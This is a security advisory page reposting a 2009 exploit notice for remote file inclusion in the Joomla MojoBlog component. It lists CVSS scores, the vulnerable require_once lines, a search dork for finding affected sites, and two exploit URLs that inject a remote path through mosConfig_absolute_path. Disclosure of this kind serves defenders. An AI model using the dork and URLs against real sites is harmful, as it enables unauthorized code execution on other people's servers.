Joomla Component MojoBlog Multiple Remote File Include vulnerability

2010-04-22 / 2010-04-23
Credit: kaMtiEz
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

######################################################################### ## Joomla Component MojoBlog Multiple Remote File Include vulnerability # ## Author : kaMtiEz (kamzcrew@yahoo.com) # ## Homepage : http://www.indonesiancoder.com # ## Date : November 20, 2009 # ######################################################################### [ Software Information ] [+] Vendor : http://www.joomlify.com/ [+] Download : http://www.joomlify.com/files/mojoblog/ [+] version : RC0.15 [+] Vulnerability : RFI [+] price : FREE [+] Dork : inurl:"com_mojo" [+] Location : INDONESIA - JOGJA ######################################################################### [ Vulnerable File ] http://127.0.0.1/components/com_mojo/wp-comments-post.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L] http://127.0.0.1/components/com_mojo/wp-trackback.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L] [ BUG IN ] [1] wp-comments-post.php [2] wp-trackback.php ====================== [1] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php'); [2] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php'); [ FIX ] contact me .. or aurakasih .. Joke.. ;) ######################################################################### [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW [+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h [+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz [+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!! [ NOTE ] [+] one day .. u will be mind .. [+] bangun tidur coba mencari celah .. dapet juga ,, :D [+] aurakasih .. aku butuh kamuwh .. hha [+] om tukulesto kapan ke kotaku ?? hha

References:

http://www.securityfocus.com/bid/37179
http://packetstormsecurity.org/0912-exploits/joomlamojoblog-rfi.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top